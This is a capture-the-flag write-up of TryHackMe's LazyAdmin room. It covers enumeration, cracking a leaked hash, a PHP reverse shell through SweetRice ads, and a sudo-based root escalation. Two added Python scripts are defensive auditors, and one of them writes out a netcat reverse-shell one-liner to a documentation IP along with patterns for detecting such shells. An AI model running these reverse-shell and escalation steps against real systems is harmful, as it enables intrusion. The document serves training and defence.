
Professional Write-up of LazyAdmin

Write-up of TryHackMe’s Lazy Admin room.

Welcome back to another write-up of an “easy” TryHackMe room. If you want to try it before reading you can find it here: LazyAdmin.

This is my shorter and more edited version of the write-up. If you want to read the more detailed step-by-step write-up including the stuff that didn’t work check out my Realistic Write-up.

This was a fun room that was frustrating at times. To find the two flags we’re going to use a number of different methods taught in TryHackMe’s educational rooms, such as Nmap port scanning, GoBuster directory brute-forcing, and a reverse shell.

First we connect to TryHackMe and start the machine. It did take a couple of extra minutes for the machine to boot for me, so if it’s not working right away, be patient.

Enumeration

Once the machine answers ping, we can run Nmap to find open ports. You can run whatever Nmap scan you like (everyone has their favorite), but here’s what I ran:

[Image: Nmap scan command]

Nmap should find a couple of open ports:

[Image: Nmap results]

As we can see, there is an SSH service on port 22 and an HTTP service on port 80. As with many TryHackMe rooms, an open HTTP port usually means there is a website. Entering the room’s IP address into our web browser brings us to a default Apache2 welcome page.

[Image: Apache2 default page at the room’s IP address]

From here I tried GoBuster to see if I could find some hidden pages.

[Image: GoBuster command]

Right away it found a /content directory. Navigating to that page shows a SweetRice welcome page. After googling “sweetrice website manager vulnerabilities” we find that Exploit-DB has a list of 8 vulnerabilities that might help us.

[Image: Exploit-DB listing for SweetRice]

We’ve got arbitrary file upload and arbitrary file download, CSRF, PHP code execution, and more. Unfortunately all of them need either an upload page, login credentials, or the SweetRice management console, none of which we’ve found yet.

All GoBuster found was the /content/ page, but it only looked one level deep. Running it again against the /content directory turns up many more options.

[Image: GoBuster scan of the /content directory for nested folders]
[Image: directories found under /content]

Just going down the list, we first find a bunch of pictures and a couple of .php files in /images, which reminded me of the last room I did (RootMe), which used a .php reverse shell. /inc has lots of interesting stuff in it, including more folders. We’ll definitely have to come back here, but for now we’re looking for an upload page or console. /as has a login page, but we don’t know the login info yet.

There was a bunch of stuff in /inc/, so let’s head back there. /inc/mysql_backup/ has a SQL dump we can download and read. Reading through it we find something very interesting:

[Image: portion of the MySQL backup file showing the username and password hash]

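The real problem here is that a database dump was sitting under the web root where anyone could fetch it. The script below is an added example (not code from the write-up or from SweetRice): it walks a document root, flags files whose extension or parent directory marks them as a backup or dump, and looks inside them for lines that pair a credential keyword with a hash-looking string, the kind of “passwd” plus hash record found in /content/inc/mysql_backup/. The directory tree it scans is constructed in a temporary folder, and the file name and hex value in it are made up.

```python
"""Web-root hygiene check for exposed backups and database dumps.

Added example; not code from the write-up or from SweetRice. The tree it
scans is constructed in a temporary directory; the dump file name and the
32-character hex value inside it are made up, not the room's real data.
"""
import os
import re
import tempfile

BACKUP_EXT = {".sql", ".bak", ".old", ".orig", ".zip", ".tar", ".gz", ".dump"}
BACKUP_DIR_RE = re.compile(r"backup|bckup|bkp|dump", re.I)
CRED_RE = re.compile(r"passw(or)?d|secret|token|api_?key", re.I)
# unsalted MD5/SHA-1 style hex digests, or a bcrypt string, on the same line
HASH_RE = re.compile(r"\b[0-9a-f]{32}\b|\b[0-9a-f]{40}\b|\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}")


def looks_like_backup(rel_path):
    """True when the name, extension or a parent directory signals a backup."""
    parts = rel_path.split(os.sep)
    name = parts[-1].lower()
    ext = os.path.splitext(name)[1]
    in_backup_dir = any(BACKUP_DIR_RE.search(p) for p in parts[:-1])
    return ext in BACKUP_EXT or in_backup_dir or name.endswith("~")


def credential_lines(path, max_lines=200_000):
    """(line number, excerpt) for lines holding a credential keyword and a hash."""
    hits = []
    try:
        with open(path, errors="replace") as fh:
            for n, line in enumerate(fh, 1):
                if n > max_lines:
                    break
                if CRED_RE.search(line) and HASH_RE.search(line):
                    hits.append((n, line.strip()[:120]))
    except OSError:
        pass  # unreadable file: report the path, but no excerpt
    return hits


def scan_webroot(root):
    """Return one finding per backup-looking file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            path = os.path.join(dirpath, f)
            rel = os.path.relpath(path, root)
            if looks_like_backup(rel):
                findings.append({
                    "path": rel,
                    "reason": "backup/dump file reachable from the web root",
                    "credentials": credential_lines(path),
                })
    return findings


def build_sample_webroot():
    """Constructed document root mirroring the layout from the write-up."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "content", "inc", "mysql_backup"))
    with open(os.path.join(root, "content", "index.php"), "w") as fh:
        fh.write("<?php echo 'welcome'; ?>\n")
    # ordinary include: mentions a password but has no hash, not in a backup dir
    with open(os.path.join(root, "content", "inc", "config.php"), "w") as fh:
        fh.write("<?php $db_pass = 'example'; ?>\n")
    # the exposed dump: a made-up 32-hex value standing in for a real digest
    dump = os.path.join(root, "content", "inc", "mysql_backup", "site-dump.sql")
    with open(dump, "w") as fh:
        fh.write("INSERT INTO `options` VALUES ('admin', 'passwd', "
                 "'0123456789abcdef0123456789abcdef');\n")
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_sample_webroot()):
        print(finding["path"], "-", finding["reason"])
        for lineno, excerpt in finding["credentials"]:
            print(f"  line {lineno}: {excerpt}")
```

Run it against a real document root by calling scan_webroot("/var/www/html") instead of the constructed tree. The HASH_RE pattern deliberately looks for bare 32 and 40 character hex strings: an unsalted fast hash like that is exactly what an online lookup service cracks in seconds, which is why finding one in a downloadable file is treated as a credential exposure rather than just a stray backup.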
Exploitation

Reading through this we see author, keywords, and a bunch of other stuff, but what stood out to me were the words “admin” and “passwd”. The long string after passwd looks like a hash, and CrackStation is able to crack it. Since the hash is two blocks after “passwd”, does that mean the username is two blocks after “admin”? Let’s head back to the login page and try it.

[Image: SweetRice management console]

It works!

Looking through the Exploit-DB page and reading the comments in the “CSRF/PHP Code Execution” entry, we learn there’s a vulnerability in the ads section that lets an attacker execute PHP code on the server.

Much like we did in the RootMe room write-up, we are going to use Pentest Monkey’s PHP reverse shell. First we copy and paste the exploit HTML code from Exploit-DB into a new advertisement on the SweetRice console.

[Image: new ad containing the Exploit-DB code]

Then we copy and paste the reverse shell into the HTML, replacing the three lines starting with echo, phpinfo, and </textarea. Don’t forget to change the IP address and port in the reverse shell code to your own IP address and the port you are listening on.

[Image: netcat listener command to catch the reverse shell]

Head back to your browser and navigate to the /ads folder. Click your file and, if it worked, your listener should have a shell. Now we just need to find the user.txt file. Since it’s a Linux system, the user’s files are usually under the home directory. Navigating there we find /home/itguy/ and our first flag.

Privilege Escalation

Now we need to figure out how to become root. Looking in the /home/itguy/ folder we see backup.pl, a Perl script that runs copy.sh. Running cat /etc/copy.sh gives us this:

[Image: contents of copy.sh]

Ok, let’s try to figure out what this does. I know “rm” is similar to “delete”, so it looks like we start with removing the /tmp/f file. After googling “mkfifo” I learn that it’s similar to the pipe | command but allows other processes to read it while it’s open. Ok, so we are removing /tmp/f and then remaking it as a FIFO. I know /bin/sh -i is an interactive shell. I also know that nc is netcat with the IP address and port. I know that you can use cat to input text into a file as you type. Is this a shell that’s making a file from netcat and the interactive shell and putting it in /tmp/f? Can I just replace my IP address and port number and send the shell to my listener instead?

First I cd over to /etc/ and then use echo to rewrite the file with my IP address and the port I’m going to listen on.

[Image: echo command rewriting copy.sh with my IP address and port]

Then we start a listener on that port too. Now we just need to figure out how to run that file with the shell. Running the command perl /home/itguy/backup.pl gives us some errors, but they are “permission denied”. Using sudo instead:

[Image: running sudo perl /home/itguy/backup.pl to connect to the listener]

Our listener connects!

It works!
We have root!

Which, honestly, is a little weird. Why does sudo work without a password? We can check a user’s permissions with sudo -l (that’s a lowercase L) and it’ll tell you what itguy can run without a password. Hey, what do you know, it’s perl and backup.pl. That’s…very convenient. I wish I had checked that earlier; that’s a good hint…
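
The chain that made this work is worth spelling out from the defender’s side: a NOPASSWD sudo rule on a script, that script executing a second file under /etc, and that second file being writable by the low-privileged user and already containing a netcat-to-shell one-liner. The audit script below is an added example (not code from the write-up): it parses sudoers-style lines for NOPASSWD rules, follows each command to the files it references, and reports anything in that chain that is world-writable or that contains mkfifo / interactive-shell / netcat indicators. The sudoers line, the file tree and the script contents are constructed in a temporary directory, and the IP address is a documentation address, not a real host.

```python
"""Audit sudo NOPASSWD rules for writable or suspicious command chains.

Added example; not code from the write-up. Everything it scans is
constructed in a temporary directory to mirror the room's layout.
"""
import os
import re
import stat
import tempfile

# e.g. "itguy ALL=(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl"
SUDOERS_RE = re.compile(r"^(\S+)\s+\S+=\(([^)]*)\)\s+NOPASSWD:\s*(.+)$")
# absolute paths mentioned inside a script; existing ones are its children
PATH_RE = re.compile(r"(/[\w.][\w./-]*)")
# indicators of a shell being wired to a network socket, as in copy.sh
REVSHELL_PATTERNS = {
    "mkfifo": re.compile(r"\bmkfifo\b"),
    "interactive shell": re.compile(r"/bin/(?:ba)?sh\s+-i\b"),
    "netcat": re.compile(r"\b(?:nc|ncat|netcat)\b\s+\S+\s+\d+"),
}


def parse_sudoers(lines):
    """(user, runas, command) for each NOPASSWD rule; comments are ignored."""
    rules = []
    for raw in lines:
        m = SUDOERS_RE.match(raw.split("#", 1)[0].strip())
        if m:
            rules.append((m.group(1), m.group(2), m.group(3).strip()))
    return rules


def is_text_file(path):
    with open(path, "rb") as fh:
        return b"\x00" not in fh.read(4096)


def world_writable(path):
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def referenced_files(path):
    """Existing text files whose absolute path appears inside a script."""
    with open(path, errors="replace") as fh:
        text = fh.read()
    return [p for p in PATH_RE.findall(text)
            if os.path.isfile(p) and is_text_file(p)]


def audit(sudoers_lines, user):
    """Findings for every file reachable from the user's NOPASSWD rules."""
    findings = []
    for ruser, runas, command in parse_sudoers(sudoers_lines):
        if ruser != user:
            continue
        # the command's own arguments, then anything those scripts reference
        chain = [t for t in command.split() if os.path.isfile(t)]
        for script in list(chain):
            if is_text_file(script):
                chain += [p for p in referenced_files(script) if p not in chain]
        for path in chain:
            if world_writable(path):
                findings.append(f"{path}: world-writable but runs as {runas} "
                                f"via NOPASSWD rule '{command}'")
            if is_text_file(path):
                with open(path, errors="replace") as fh:
                    body = fh.read()
                hits = [n for n, rx in REVSHELL_PATTERNS.items() if rx.search(body)]
                if hits:
                    findings.append(f"{path}: reverse-shell indicators {hits}")
    return findings


def build_sample():
    """Constructed tree: root-owned backup.pl calling a world-writable copy.sh."""
    root = tempfile.mkdtemp(prefix="sudo-audit-")
    etc, home = os.path.join(root, "etc"), os.path.join(root, "home", "itguy")
    os.makedirs(etc)
    os.makedirs(home)
    copy_sh = os.path.join(etc, "copy.sh")
    with open(copy_sh, "w") as fh:  # 192.0.2.10 is a documentation address
        fh.write("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1"
                 "|nc 192.0.2.10 5554 >/tmp/f\n")
    os.chmod(copy_sh, 0o777)        # the misconfiguration: anyone may edit it
    backup_pl = os.path.join(home, "backup.pl")
    with open(backup_pl, "w") as fh:
        fh.write(f'system("sh", "{copy_sh}");\n')
    os.chmod(backup_pl, 0o755)
    return [f"itguy ALL=(ALL) NOPASSWD: /usr/bin/perl {backup_pl}"]


if __name__ == "__main__":
    for line in audit(build_sample(), "itguy"):
        print(line)
```

On a real host you would feed it the output of sudo -l or the contents of /etc/sudoers and /etc/sudoers.d/*, with the user you are checking. The fix the findings point at is the same in both cases: a script run via NOPASSWD, and everything it executes, must be writable only by root, and a file under /etc that contains a netcat-to-shell line is something to investigate rather than just chmod.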

Anyway…

We’re root!

[Image: navigating to the root flag, and the end of our write-up]

This was a fun room and I feel like I learned some stuff. I spent quite a bit of time googling and learning about what that single line shell did. I’m not entirely sure I could reproduce it but at least I understood well enough to guess what it was doing.

I hope you enjoyed reading along. Let me know in the comments if you have questions, suggestions, or criticisms.
